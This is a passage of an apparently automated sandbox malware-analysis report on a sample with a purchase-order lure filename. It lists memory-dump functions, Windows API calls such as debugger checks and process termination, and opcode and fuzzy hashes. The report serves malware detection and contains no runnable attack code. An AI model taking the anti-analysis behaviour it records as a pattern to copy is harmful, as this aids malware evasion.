Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Yara matches

Similarity

API ID: AllocString_malloc
String ID:
API String ID: 959018026-0
Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA

Function 02BD4B70 Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultUILanguage.KERNEL32(74DF2EE0,00000001,?,0000004C,00000000,Function_00004F70,00000000,00000000), ref: 02BD4B76

Memory Dump Source

Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: ebbd913648c683b9ce10133b7f5f9d7d6768f18e2f46c354c26891ee6edd8c85
Instruction ID: 3e2e7b52ac6c1cfecea9e88c932ad86552098d890d3eae4a43189a7449481a6f
Opcode Fuzzy Hash: ebbd913648c683b9ce10133b7f5f9d7d6768f18e2f46c354c26891ee6edd8c85
Instruction Fuzzy Hash: 67E0D829844912F3EE3C5538C9476F76234E745629FDC0BD37527824F1B7754540C153

Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549

Memory Dump Source

Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

Function 0040EA0A Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_doexit.LIBCMT ref: 0040EA16

Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4

Memory Dump Source

Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Yara matches

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189

Function 036A9308 Relevance: 1.3, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 036A936A

Memory Dump Source

Source File: 00000008.00000002.1759970381.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_36a0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: ad360391044553508a65f2a8e3843ff5c7d8f665703af21be33354fdf54624a9
Instruction ID: 1ce26dbe1405deaf07e33f4edc28e611aae3920d996e2cae62d19d3efb5f6ca3
Opcode Fuzzy Hash: ad360391044553508a65f2a8e3843ff5c7d8f665703af21be33354fdf54624a9
Instruction Fuzzy Hash: 8B1136B1D002488FCB24DFAAC4457DEFBF4EB88324F248429D559A7250CB74A944CFA4

Function 034AD6DC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1754385015.00000000034AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 034AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_34ad000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f880d3b72498c7acd714dfe440e7c995633bb130675cf333e961a32bec334000
Instruction ID: 4a425336f6026f3cb893a5c5ae3848bb72d0895889a0c275417b2a15658e345c
Opcode Fuzzy Hash: f880d3b72498c7acd714dfe440e7c995633bb130675cf333e961a32bec334000
Instruction Fuzzy Hash: DA214879900600DFCB08EF18C9C0B1BBF66FBA4315F24C1AAE8090F756C336D446C6A1

Function 034AD5F0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1754385015.00000000034AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 034AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_34ad000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 177c768527f63d703d01f3e54bf2af99e9edba5f85c02dcb16ad1c48a54dd5a1
Instruction ID: 32b53c700a6d2d321396f4d8088c831ac473fa2af2068473019b0a4a860f234b
Opcode Fuzzy Hash: 177c768527f63d703d01f3e54bf2af99e9edba5f85c02dcb16ad1c48a54dd5a1
Instruction Fuzzy Hash: 822148B1900600DFCB00EF18C9D0B2BBF65FBA8310F24C5AAE8090F726C336D456CAA5

Function 034AD5EB Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1754385015.00000000034AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 034AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_34ad000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b90c45bf349dc2233ec1b6a7f64fdb6126ff75985651e60f21b20b7a1f428906
Instruction ID: 237da1e9c6f2f638bb30c01d078d096bf5b239cd8ea1d6b89081acb0876e7525
Opcode Fuzzy Hash: b90c45bf349dc2233ec1b6a7f64fdb6126ff75985651e60f21b20b7a1f428906
Instruction Fuzzy Hash: EC11E176804280CFCB02DF04D5C4B16BF71FB94314F28C5AAD8080F626C336D45ACBA1

Function 034AD6D7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1754385015.00000000034AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 034AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_34ad000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b90c45bf349dc2233ec1b6a7f64fdb6126ff75985651e60f21b20b7a1f428906
Instruction ID: 427dcdcdff663dd2d3d59b648e499031f46e1991a983839fe5ae653804aa0751
Opcode Fuzzy Hash: b90c45bf349dc2233ec1b6a7f64fdb6126ff75985651e60f21b20b7a1f428906
Instruction Fuzzy Hash: 6F11B17A904644CFCB06CF14D5C4B1ABF62FBA5314F28C6AAD8090F756C336D45ACBA2

Function 034AD006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1754385015.00000000034AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 034AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_34ad000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebdac7e0b01dbd9694da60a5808d52012366cda60f414cbb2beb8f5b781039ad
Instruction ID: 61aa0aca3f393d4f418c4c6077eaa0dfb6820c8c3052861f70406a4bb001725a
Opcode Fuzzy Hash: ebdac7e0b01dbd9694da60a5808d52012366cda60f414cbb2beb8f5b781039ad
Instruction Fuzzy Hash: D4018C7140E7C09ED7128B25C894B56BFB4EF53228F0DC0DBD8888F6A3C2699849D772

Function 034AD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1754385015.00000000034AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 034AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_34ad000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2cfdc0fe185da679a4b13be1a3172f3796fac5e545d015ffdad13e76fa15e1e
Instruction ID: 0ae715f550f7d5d0efef8e840569b42f20bfceb5da5c53d603185edab78c4415
Opcode Fuzzy Hash: e2cfdc0fe185da679a4b13be1a3172f3796fac5e545d015ffdad13e76fa15e1e
Instruction Fuzzy Hash: 1901F77080DB409AE710CA2DCD84767FF98EF52328F0CC46BEC584F646C2799842D6B5

Non-executed Functions

Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 004136F4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
TerminateProcess.KERNEL32(00000000), ref: 00413737

Memory Dump Source

Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D

Function 02C11361 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 02C11459
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02C11463
UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 02C11470

Memory Dump Source

Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 02f60baf222c232501203ad02505366c734adb0e2b3bccd51ba9465c618345b5
Instruction ID: af16634ddb237e866dddc3fb7f0ee80e748dd417613de900ea917e82ebc7ef01
Opcode Fuzzy Hash: 02f60baf222c232501203ad02505366c734adb0e2b3bccd51ba9465c618345b5
Instruction Fuzzy Hash: 57310375D0122CABCB21DF68D889B8CBBB8BF09310F5042EAE40DA7250E7749B919F44

Function 02C13F3D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,02C13F13,00000003,02C2DE80,0000000C,02C1403D,00000003,00000002,00000000,?,02C12038,00000003), ref: 02C13F5E
TerminateProcess.KERNEL32(00000000,?,02C13F13,00000003,02C2DE80,0000000C,02C1403D,00000003,00000002,00000000,?,02C12038,00000003), ref: 02C13F65
ExitProcess.KERNEL32 ref: 02C13F77

Memory Dump Source

Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 09c502bb5fb3fc9ea713db1375a8c0633191932b18a3e1e45827c4eee39bb0f7
Instruction ID: 844cd3a36ce29e7eacd863ef3aba362bdf4f0926024e6feae1c0ad964e3c58c7
Opcode Fuzzy Hash: 09c502bb5fb3fc9ea713db1375a8c0633191932b18a3e1e45827c4eee39bb0f7
Instruction Fuzzy Hash: C6E04631545948ABCF116F68DD0AB583B3AFB8A395F104894F8098B121DB36DD53EA80

Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0040ADD0
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1

Memory Dump Source

Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58

Function 004123F1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6

Memory Dump Source

Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569

Function 004A0994 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
Instruction ID: a660be20e8b83a6a37b5dc48827ddad1653b91f65383dc4001cb042e5c412145
Opcode Fuzzy Hash: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
Instruction Fuzzy Hash: 7831F2A2A053845BFF328A689814AB77B689B733B4F1C41E7E48487393D13D9C44C3AD

Function 02BD1130 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,034218D8), ref: 004170C5
MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
_malloc.LIBCMT ref: 0041718A
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
_malloc.LIBCMT ref: 0041724C
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
__freea.LIBCMT ref: 004172A4
__freea.LIBCMT ref: 004172AD
___ansicp.LIBCMT ref: 004172DE
___convertcp.LIBCMT ref: 00417309
LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
_malloc.LIBCMT ref: 00417362
_memset.LIBCMT ref: 00417384
LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
___convertcp.LIBCMT ref: 004173BA
__freea.LIBCMT ref: 004173CF
LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9

Memory Dump Source

Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Yara matches

Similarity

API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
String ID:
API String ID: 3809854901-0
Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98

Function 02C124FF Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 02C12543

Part of subcall function 02C13073: _free.LIBCMT ref: 02C13090
Part of subcall function 02C13073: _free.LIBCMT ref: 02C130A2
Part of subcall function 02C13073: _free.LIBCMT ref: 02C130B4
Part of subcall function 02C13073: _free.LIBCMT ref: 02C130C6
Part of subcall function 02C13073: _free.LIBCMT ref: 02C130D8
Part of subcall function 02C13073: _free.LIBCMT ref: 02C130EA
Part of subcall function 02C13073: _free.LIBCMT ref: 02C130FC
Part of subcall function 02C13073: _free.LIBCMT ref: 02C1310E
Part of subcall function 02C13073: _free.LIBCMT ref: 02C13120
Part of subcall function 02C13073: _free.LIBCMT ref: 02C13132
Part of subcall function 02C13073: _free.LIBCMT ref: 02C13144
Part of subcall function 02C13073: _free.LIBCMT ref: 02C13156
Part of subcall function 02C13073: _free.LIBCMT ref: 02C13168

_free.LIBCMT ref: 02C12538

Part of subcall function 02C12096: HeapFree.KERNEL32(00000000,00000000,?,02C13208,?,00000000,?,00000000,?,02C1322F,?,00000007,?,?,02C12697,?), ref: 02C120AC
Part of subcall function 02C12096: GetLastError.KERNEL32(?,?,02C13208,?,00000000,?,00000000,?,02C1322F,?,00000007,?,?,02C12697,?,?), ref: 02C120BE

_free.LIBCMT ref: 02C1255A
_free.LIBCMT ref: 02C1256F
_free.LIBCMT ref: 02C1257A
_free.LIBCMT ref: 02C1259C
_free.LIBCMT ref: 02C125AF
_free.LIBCMT ref: 02C125BD
_free.LIBCMT ref: 02C125C8
_free.LIBCMT ref: 02C12600
_free.LIBCMT ref: 02C12607
_free.LIBCMT ref: 02C12624
_free.LIBCMT ref: 02C1263C

Memory Dump Source

Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 8be41d02eccd186362186d0af5c591187682da4b0d504738e26a30dfd74ee8c6
Instruction ID: dabf679bad911252937e21004670abb9d4afc483fc2f4c05d73754e64cb4ef25
Opcode Fuzzy Hash: 8be41d02eccd186362186d0af5c591187682da4b0d504738e26a30dfd74ee8c6
Instruction Fuzzy Hash: 8F318B75A003219FEB31AA38DC56B56B3EAFB42311F104519EC4AD7190EF70EA80FB52

Function 02C11A1B Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON

Download Yara Rule

APIs

RtlDecodePointer.NTDLL(00000000), ref: 02C11A3E

Strings

asin, xrefs: 02C11BAA
pow, xrefs: 02C11B22, 02C11BCE, 02C11BE1
acos, xrefs: 02C11BB6
sqrt, xrefs: 02C11BC2
log10, xrefs: 02C11A88, 02C11AD8
exp, xrefs: 02C11B03, 02C11B65
log, xrefs: 02C11AE4, 02C11AF0

Memory Dump Source

Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: a1b561dd9d6f6d9efe4b487bc64dd19ceff411d47f2d253dfa5adb5cc5406607
Instruction ID: 5911de79bb7c95c6d1b4f780b8bbacd5076e00d1f1198481406dc1dc188e1bf1
Opcode Fuzzy Hash: a1b561dd9d6f6d9efe4b487bc64dd19ceff411d47f2d253dfa5adb5cc5406607
Instruction Fuzzy Hash: 1E51B5B1A0451ACBCF00DF58DA4A1ED7FB4FF4B314F1801C5D649A7254DBB98A28EB64

Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 004057DE

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

_malloc.LIBCMT ref: 00405842
_malloc.LIBCMT ref: 00405906
_malloc.LIBCMT ref: 00405930

Strings

1.2.3, xrefs: 004058EC, 00405937

Memory Dump Source

Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Yara matches

Similarity

API ID: _malloc$AllocateHeap
String ID: 1.2.3
API String ID: 680241177-2310465506
Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A

Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040BD24
_memcpy_s.LIBCMT ref: 0040BD99
__fileno.LIBCMT ref: 0040BDF9
__read.LIBCMT ref: 0040BE00
__filbuf.LIBCMT ref: 0040BE24
_memset.LIBCMT ref: 0040BE6A
_memset.LIBCMT ref: 0040BE95

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Memory Dump Source

Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
